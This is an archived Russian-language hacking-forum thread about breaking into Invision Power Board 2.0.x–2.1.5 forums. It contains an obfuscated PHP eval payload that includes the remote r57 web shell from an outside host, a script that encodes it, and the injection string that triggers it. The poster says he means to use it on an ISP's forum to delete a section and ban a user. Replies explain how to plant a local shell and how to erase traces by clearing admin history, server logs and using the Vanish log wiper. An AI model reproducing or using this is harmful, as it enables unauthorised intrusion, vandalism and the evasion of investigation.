Вопросик по шеллу [Архив]

Просмотр полной версии : Вопросик по шеллу

Sulf aka Joker

08.07.2006, 14:49

Вот шелл для ипб 2.0.х - 2.1.5.

eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //

Значиццо выглядит это так :

<?php $str="include \"http://rst.void.ru/download/r57shell.txt\";/*";// */ echo "eval( "; for($i=0;$i<strlen($str);$i++) { echo "chr(".ord($str[$i])."). "; } echo "chr(".ord(" ").") ); //"; ?>

Тут созревает вопрос : шелл заливается через создание темы, поиск темы, и добавки кода вызова шелла :

&lastdate=z|eval.*?%20//)%23e%00

Тоесть, если я сменю состав сообщения, вместо кода я впишу 123 и код вытру - то шелл не будет присутствовать не серве, тем самым следы можно замести? Я так понимаю хак работает через внешний шелл и не подгружает его в сам форум.

bul.666

08.07.2006, 14:55

то шелл не будет присутствовать не серве, тем самым следы можно замести?

Следы можно замести только почистив хистори...

bandera

08.07.2006, 14:57

Мля ну ты дал. Include есть Include.
Конечно ... не подгружает его в сам форум.

Sulf aka Joker

08.07.2006, 14:57

Я имею ввиду - то что в админке будет виден заход другого админа это да, но например администрация серва - она как догадается что форум открыли именно через этот шелл?

bandera

08.07.2006, 15:00

форум открыли
Это как?-)))

Sulf aka Joker

08.07.2006, 15:02

Всмысле проникли в админку ну и так далее - по выбору. Будет видно что новый админ появился, и всё, верно? То что именно р57 шелл юзали, не будет видно?

Azazel

08.07.2006, 15:02

Ну да, находится на rst, а выполняется на жертве.
Просто залей через него локальный шелл и потри сообщение.

Sulf aka Joker

08.07.2006, 15:05

Я просто хочу на одном форуме провайдера, вытереить один раздел форум и забанить 1 юзера, ну не хочу чтоб меня запалили под этим делом. Под прокси всё буду делать, потом тему с кодом шелла вытру полностью. Так не запалят?

bul.666

08.07.2006, 15:06

И хистори сотри....

Sulf aka Joker

08.07.2006, 15:07

А хистори - в админке типо?

Tem

08.07.2006, 17:30

Да но через шелл тожа можна.

Ch3ck

08.07.2006, 17:32

И там и на серве...(логи)

Sulf aka Joker

08.07.2006, 17:39

А что логи? Под проксей был (anonymouse.org) на серве не додумался удалить логов. Не знаю как.

Ch3ck

08.07.2006, 18:29

Почитай про логвайпер Vanish поймешь... или вручную немного похимичить. :cool: